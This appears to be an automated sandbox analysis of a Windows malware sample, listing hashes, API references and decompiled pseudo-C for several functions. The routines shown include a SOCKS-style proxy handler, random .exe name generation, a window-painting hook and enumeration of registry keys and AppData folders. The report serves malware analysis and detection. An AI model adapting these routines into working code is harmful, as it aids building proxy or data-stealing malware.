    • Opcode ID: c8bfe3b45fa409a80420dbf189d15c0c4fbe2b2fe79c2d41dfebf69492de5cb9
    • Instruction ID: 92eae0c657f4527d92254eb329bae3aa5fdd8216ce0b74c91d170cb7f81f2065
    • Opcode Fuzzy Hash: c8bfe3b45fa409a80420dbf189d15c0c4fbe2b2fe79c2d41dfebf69492de5cb9
    • Instruction Fuzzy Hash: 48314731500219ABDF228FA5CD48FDE7BB9BF08304F004166F908A62A0C7B9E9D0DF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040702D(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				char _v28;
    				struct HWND__* _v32;
    				intOrPtr _v36;
    				struct HWND__* _v40;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t52;
    				signed int _t54;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v32 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
    					L12:
    					return 1;
    				}
    				_t29 =  *((intOrPtr*)(_t61 + 0x14));
    				_t54 =  *(_t29 + 0x24);
    				if((_t54 & 0x40000000) == 0) {
    					_t52 =  *_t61 + 0x24;
    				} else {
    					_t52 = _t61 + 4;
    				}
    				if((_t54 & 0x10000000) == 0) {
    					_t30 = 0;
    					goto L9;
    				} else {
    					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
    						L10:
    						E00406EBC( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
    						_v36 =  *_t61;
    						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
    						if(GetTopWindow(_v40) != 0) {
    							E0041640F( &_v28, _t35);
    						}
    						goto L12;
    					}
    					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
    						goto L12;
    					}
    					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
    					L9:
    					if(_t30 == 0) {
    						goto L12;
    					}
    					goto L10;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Rect$IntersectWindow$EmptyInfo
    • String ID:
    • API String ID: 1664082778-0
    • Opcode ID: 1a51ed025b18ed400249223745f826c59d289748f49b9af6de5b0c37ad00f426
    • Instruction ID: c50a79028752804c12e36a1740f9f6e937e3b3039b1681199d95bf64d1dbe1b7
    • Opcode Fuzzy Hash: 1a51ed025b18ed400249223745f826c59d289748f49b9af6de5b0c37ad00f426
    • Instruction Fuzzy Hash: 7121AC716083019BD720DF28DD84E97B3ECAF44700B044A2EB892E3791DB39F9099B76
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00419AAB(void* __ecx, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				char _v724;
    				void* __edi;
    				intOrPtr _t18;
    				void* _t26;
    				void* _t40;
    				WCHAR* _t43;
    
    				_t40 = __ecx;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = E0041CA33(_t40, 0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					E0041C9FB(0xff220829,  &_v204, 0);
    					_t43 =  &_v724;
    					E0041CD51(_t40, _t43, __esi, 1);
    					PathQuoteSpacesW(_t43);
    					_t41 = _t43;
    					_v8 = E0041284D(_t43);
    					if(E0041CB59() == 0) {
    						L7:
    						E004154D1(_v12);
    						return 0;
    					}
    					_push(__esi);
    					_t26 = 3;
    					E00419897(_t26,  &_v104);
    					if(WaitForSingleObject( *0x424024, 0xc8) != 0x102) {
    						L6:
    						goto L7;
    					}
    					_v8 = _v8 + _v8 + 2;
    					do {
    						E00415F81(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
    					} while (WaitForSingleObject( *0x424024, 0xc8) == 0x102);
    					goto L6;
    				}
    				return _t18 + 1;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 00419AB6
    • SetThreadPriority.KERNEL32(00000000), ref: 00419ABD
      • Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54
    • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 00419B00
    • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00419B38
    • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 00419B6E
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
    • String ID:
    • API String ID: 123286213-0
    • Opcode ID: 926aa25df16a5d179b1a8ccc8b94a718ce8b155d34b04c9fad9977fc0bcb2ccc
    • Instruction ID: 941b93ef7c4bc703d0734377c072a84272e080a075ddd60badc328fceffd07cc
    • Opcode Fuzzy Hash: 926aa25df16a5d179b1a8ccc8b94a718ce8b155d34b04c9fad9977fc0bcb2ccc
    • Instruction Fuzzy Hash: 3D21A171E00208AFDF11EBA1DD85FEE7BB9EB44344F10006AF501F71A0DA789E818B58
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #23.WS2_32(?,00000002,00000000,00000000,00000000,00000002,?,?,00000000), ref: 00415235
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0041525F
    • #111.WS2_32 ref: 00415266
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00415292
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • #3.WS2_32(?), ref: 004152A6
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Ioctl$#111FreeHeap
    • String ID:
    • API String ID: 1077273850-0
    • Opcode ID: 5db9e945f662ff890b58769470e340489ec91b50404a67f8d039d0e6dfc431c9
    • Instruction ID: 680ddaf24449e80ffade0b0a93b0082cc5e0a9b085d1d9dc2ec49e7e66ba68b9
    • Opcode Fuzzy Hash: 5db9e945f662ff890b58769470e340489ec91b50404a67f8d039d0e6dfc431c9
    • Instruction Fuzzy Hash: 031191B2801128FFDB109BA5DD49CDF7F2CEF953A4B100155F509E6160D2748F81DAE4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00406C33(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x423b60 & 0x00000004) == 0 || E0041CB59() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x42291c);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							E00411D3A( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}








    APIs
    • GetUpdateRect.USER32(?,?,?), ref: 00406CBA
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • TlsGetValue.KERNEL32 ref: 00406C53
    • SaveDC.GDI32(?), ref: 00406C83
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 00406C93
    • RestoreDC.GDI32(?,00000000), ref: 00406CA5
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: b976798dc2aa6e191c371ef28a488bd6232ce2aa9279aea17404f7bdb35836e0
    • Instruction ID: b46e36ecbfa026970fb6d20800ac71d22960878f0fc247fac30e8f39ca08555f
    • Opcode Fuzzy Hash: b976798dc2aa6e191c371ef28a488bd6232ce2aa9279aea17404f7bdb35836e0
    • Instruction Fuzzy Hash: C611C231104745EFDB219F62DE48F9B7BA8EB04314F00843AF986E21B1C739A451CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00406E28() {
    				struct tagMSG _v32;
    				signed int _t12;
    				intOrPtr _t15;
    				char _t17;
    				intOrPtr _t19;
    				void* _t21;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x422924);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					__eflags = _t12;
    					if(_t12 == 0) {
    						break;
    					} else {
    						__eflags = _v32.message -  *0x422920; // 0x0
    						if(__eflags == 0) {
    							__eflags = _v32.wParam - 0xfffffffc;
    							if(_v32.wParam == 0xfffffffc) {
    								_t15 =  *0x422928; // 0x0
    								__eflags = _t15 + 0x114;
    								_t17 = E004066DB(_t15 + 0x114, _t19, _t21, 0x422918, _v32.lParam, 1);
    								_t19 =  *0x422928; // 0x0
    								 *((char*)(_t19 + 0x124)) = _t17;
    								SetEvent( *0x422924);
    							}
    						}
    						continue;
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}










    APIs
    • GetCurrentThread.KERNEL32 ref: 00406E35
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041D5D0), ref: 00406E3C
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0041D5D0), ref: 00406E4E
    • SetEvent.KERNEL32(00422918,?,00000001), ref: 00406E9B
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00406EA8
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: 0e7b19ea20b954f56b54a8af1980c8ad46da0c50edac45e430c5c637ca33c364
    • Instruction ID: 9b2ea45552039518e560ddc03244cae4d46747c4fdcee4069202594f267e01db
    • Opcode Fuzzy Hash: 0e7b19ea20b954f56b54a8af1980c8ad46da0c50edac45e430c5c637ca33c364
    • Instruction Fuzzy Hash: 4101D6313003106BCB20AF64EE45B9637A4AF84730F51073AF521B61F0CB74A4518B9D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,000207F8,0041A053,00000000), ref: 00419C20
    • ReleaseMutex.KERNEL32(?), ref: 00419C54
    • IsWindow.USER32(?), ref: 00419C5B
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 00419C7D
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
    • Instruction ID: 5e5cd4f1bc1b935a0ec51661bb5232b9974ab2aa9beaefa4869282207e98cc10
    • Opcode Fuzzy Hash: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
    • Instruction Fuzzy Hash: 0AF019742047009FD3209F24E9489A6BBF4FB89711B044A7DF8D6937B1D770A884CB25
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,745FA660,0041A053,00000000), ref: 00419C20
    • ReleaseMutex.KERNEL32(?), ref: 00419C54
    • IsWindow.USER32(?), ref: 00419C5B
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 00419C75
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 00419C7D
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
    • Instruction ID: 5e5cd4f1bc1b935a0ec51661bb5232b9974ab2aa9beaefa4869282207e98cc10
    • Opcode Fuzzy Hash: 35c340f7b741d5c84b8ce1e28aeaa712a18d8af1794ea080629abf2c432c982f
    • Instruction Fuzzy Hash: 0AF019742047009FD3209F24E9489A6BBF4FB89711B044A7DF8D6937B1D770A884CB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040614C(void* __eflags, signed int _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				signed int _v24;
    				signed int _v29;
    				short _v31;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				short _v50;
    				char _v52;
    				char _v312;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t59;
    				void* _t61;
    				short _t77;
    				void* _t79;
    				void* _t84;
    				char _t103;
    				char* _t105;
    				signed int _t115;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t127;
    				char _t129;
    				void* _t131;
    				intOrPtr _t132;
    				void* _t133;
    
    				_t110 = _a4;
    				_t59 = E004152B6(_t110);
    				_push(0);
    				_push( &_v32);
    				_t61 = 7;
    				_v24 = 0 | _t59 == 0x00000017;
    				if(E00414CB1(_t61, _t110) != 0) {
    					while(E00414CB1(1, _t110,  &_v9, 0) != 0) {
    						if(_v9 == 0) {
    							_t115 = _v29;
    							_t116 = _t115 << 0x10;
    							_v13 = 0x5a;
    							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L20:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L44:
    									_t55 =  &_v24; // 0x405120
    									return E004060D6(_t110, 0xffffffff, _v13,  *_t55) & 0xffffff00 | _t73 != 0x00000000;
    								}
    								E00411DB1( &_v52,  &_v52, 0, 0x10);
    								_t77 = 2;
    								_v52 = _t77;
    								_t79 = (_v32 & 0x000000ff) - 1;
    								if(_t79 == 0) {
    									_v50 = _v31;
    									_v48 = _v29;
    									_t127 = E00414D46( &_v52);
    									if(_t127 == 0xffffffff) {
    										L23:
    										_v13 = 0x5b;
    										goto L44;
    									}
    									E004150F9(_t116, _t127);
    									_t50 =  &_v24; // 0x405120
    									_t84 = E004060D6(_t110, _t127, 0x5a,  *_t50);
    									if(_t84 != 1) {
    										if(_t84 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										_push(_t127);
    										_t84 = E00414EFA(_t110);
    									}
    									E004150A1(_t84, _t127);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L34:
    										return _v9;
    									} else {
    										goto L44;
    									}
    								}
    								if(_t79 == 1) {
    									_t129 = E00414E40( &_v52, 1);
    									_v20 = _t129;
    									if(_t129 == 0xffffffff) {
    										goto L23;
    									}
    									_t32 =  &_v24; // 0x405120
    									_t125 = E004060D6(_t110, _t129, 0x5a,  *_t32);
    									if(_t125 != 1) {
    										L31:
    										E004150A1(_t89, _t129);
    										if(_t125 == 0xffffffff) {
    											goto L23;
    										}
    										if(_t125 != 1) {
    											_v9 = 0;
    										}
    										goto L34;
    									}
    									_t126 = E00415071( &_v20,  &_a4);
    									_v36 = _t126;
    									E004150A1(_t93, _v20);
    									if(_t126 != 0xffffffff) {
    										E004150F9(_t116, _t126);
    										_t110 = _a4;
    										_t125 = E004060D6(_a4, _t126, 0x5a, _v24 | 0x00000002);
    										if(_t125 == 1) {
    											_push(_v36);
    											_t89 = E00414EFA(_t110);
    										}
    										_t129 = _v36;
    										goto L31;
    									}
    									_t110 = _a4;
    									_v13 = 0x5b;
    									goto L44;
    								}
    								goto L23;
    							}
    							_t131 = 0;
    							while(1) {
    								_t116 = _t110;
    								if(E00414CB1(1, _t110,  &_v9, 0) == 0) {
    									goto L1;
    								}
    								_t103 = _v9;
    								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
    								if(_t103 == 0) {
    									_t105 =  &_v312;
    									_v20 = 0;
    									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
    									if(_t105 == 0) {
    										_t132 = _v20;
    										while(_t132 != 0) {
    											if( *((intOrPtr*)(_t132 + 4)) == 2) {
    												E00411D3A( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t132 == 0) {
    													goto L12;
    												}
    												goto L20;
    											}
    											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
    										}
    										goto L19;
    									}
    									L12:
    									_v13 = 0x5b;
    									goto L20;
    								}
    								_t131 = _t131 + 1;
    								if(_t131 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}


































    APIs
      • Part of subcall function 004152B6: #6.WS2_32(?,?,?), ref: 004152D4
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040621B
    • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406254
      • Part of subcall function 004150F9: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0040530A,00000000), ref: 0041510F
      • Part of subcall function 004060D6: #5.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 004060FA
      • Part of subcall function 00414EFA: #18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00414F9A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfo
    • String ID: Q@$[
    • API String ID: 1109861670-161043652
    • Opcode ID: 0110c680047cf071fac25ba66387492684a481b15a11aad9589653b4ad7bcdcf
    • Instruction ID: ee0252876a6dc4b4f2e3b2f326d1f8f38a0852e5eafea310ca28aaecfb6daa1d
    • Opcode Fuzzy Hash: 0110c680047cf071fac25ba66387492684a481b15a11aad9589653b4ad7bcdcf
    • Instruction Fuzzy Hash: 6A614B31D00114ABDF20ABA88C01AEFBBB5AF45354F02467BEC57B72C2D67C895187A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00416081(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				signed int _t56;
    				WCHAR* _t57;
    				short* _t59;
    				signed short _t71;
    				char* _t77;
    				signed int _t84;
    				signed short* _t85;
    				signed int _t87;
    				intOrPtr _t88;
    				void* _t89;
    
    				_t87 = E00413083(__eax & 0x000000ff, __ecx & 0x000000ff);
    				_v16 = _t87;
    				_t56 = E00413037();
    				_t77 = "bcdfghklmnpqrstvwxz";
    				if((_t56 & 0x00000100) == 0) {
    					_v32 = "aeiouy";
    					_v28 = _t77;
    				} else {
    					_v32 = _t77;
    					_v28 = "aeiouy";
    				}
    				_t84 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_t87 > 0) {
    					_v20 = _a4 & 0x00000004;
    					do {
    						if(_v8 == 2) {
    							if((E00413037() & 0x00000100) == 0) {
    								_v32 = "aeiouy";
    								_v28 = _t77;
    							} else {
    								_v32 = _t77;
    								_v28 = "aeiouy";
    							}
    							_v8 = _v8 & 0x00000000;
    						}
    						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
    						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
    						if(_v20 == 0 || _t84 - _v12 <= 1 || (E00413037() & 0x00000101) != 0x101) {
    							_t71 =  *((char*)(E00413083(_v24 - 1, 0) + _t88));
    						} else {
    							_t71 = 0x20;
    							_v12 = _t84;
    						}
    						_a8[_t84] = _t71;
    						_t84 = _t84 + 1;
    						_v8 = _v8 + 1;
    					} while (_t84 < _v16);
    					_t87 = _v16;
    				}
    				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
    					_t85 = _a8;
    				} else {
    					_t85 = _a8;
    					_t59 = _t85 + _t87 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t87 = _t87 - 1;
    						if(_t87 != 0) {
    							continue;
    						} else {
    						}
    						goto L24;
    					}
    				}
    				L24:
    				_t57 = 0;
    				_t85[_t87] = 0;
    				if((_a4 & 0x00000002) != 0) {
    					_t57 = CharUpperW( *_t85 & 0x0000ffff);
    					 *_t85 = 0;
    				}
    				return _t57;
    			}





















    APIs
      • Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037
    • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 004161A2
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CharCountTickUpper
    • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 2674899715-3410450461
    • Opcode ID: a8d09f88985c50193b103d0d792469a4c88ea91ab3fc87b2baf780b2572740b7
    • Instruction ID: 6239e78a5a9a1b5f0950657de931472cef4cd21e15ea04d74ec5885d045acbf0
    • Opcode Fuzzy Hash: a8d09f88985c50193b103d0d792469a4c88ea91ab3fc87b2baf780b2572740b7
    • Instruction Fuzzy Hash: 3D319A71E00219BBCB10DFA9C4452FEBBB5EF44345F56846BD811AB382D379DA81CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00409188(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v76;
    				char _v116;
    				char _v636;
    				short _v1156;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00411DB1( &_v12,  &_v12, 0, 8);
    				_t28 = 0x60;
    				E00419897(_t28,  &_v116);
    				_t30 = 0x61;
    				E00419897(_t30,  &_v52);
    				_t55 =  &_v636;
    				_t35 = E00415E26(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
    						E00408F40(_t65,  &_v1156,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E00411CFE(_v12);
    					}
    					_push(0xcb);
    					return E00407DEB(_t54, _v12, 0x63);
    				} else {
    					_t60 =  &_v76;
    					_t39 = 0x62;
    					E00419897(_t39, _t60);
    					_v28 = 0x23;
    					_v24 = 0x1a;
    					_v20 = 0x26;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v636;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E00417437( &_v636,  &_v16, _t68, 1, 2, E00408F9A,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}




























    APIs
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004091EA
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040923A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 43538cafdd8c9a33fbe7bf09d678f73140996fc91666c8b6601cdf5ccba15883
    • Instruction ID: e262041236586c3b82cfe444529a9ebe07c4a5474d135b33634015b1bae7a53a
    • Opcode Fuzzy Hash: 43538cafdd8c9a33fbe7bf09d678f73140996fc91666c8b6601cdf5ccba15883
    • Instruction Fuzzy Hash: C0316FB2D00218BADF10ABA09C89EDE777CEB44308F1049ABF601F7191D6785E858B94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00409A38(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				char _v68;
    				char _v120;
    				char _v644;
    				short _v1164;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00411DB1( &_v12,  &_v12, 0, 8);
    				_t28 = 0x77;
    				E00419897(_t28,  &_v120);
    				_t30 = 0x78;
    				E00419897(_t30,  &_v44);
    				_t55 =  &_v644;
    				_t35 = E00415E26(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
    						E004097DB(_t65,  &_v1164,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E00411CFE(_v12);
    					}
    					_push(0xcb);
    					return E00407DEB(_t54, _v12, 0x7a);
    				} else {
    					_t60 =  &_v68;
    					_t39 = 0x79;
    					E00419897(_t39, _t60);
    					_v28 = 0x1a;
    					_v24 = 0x26;
    					_v20 = 0x23;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v644;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E00417437( &_v644,  &_v16, _t68, 1, 2, E00409813,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}




























    APIs
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 00409A9A
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00409AEA
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 9fded5c4d8259019fc4f62279f25682ee29fe94f3ac7c4379ef7620eeb378ab7
    • Instruction ID: 1e275e509e97a07c248b217a8456c392d5b0c613d2968b29449a098f745697d2
    • Opcode Fuzzy Hash: 9fded5c4d8259019fc4f62279f25682ee29fe94f3ac7c4379ef7620eeb378ab7
    • Instruction Fuzzy Hash: 303171B2D00218AADF10EBE19C85EDE777CEB44314F10457BF605F7181DA786E858B94
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
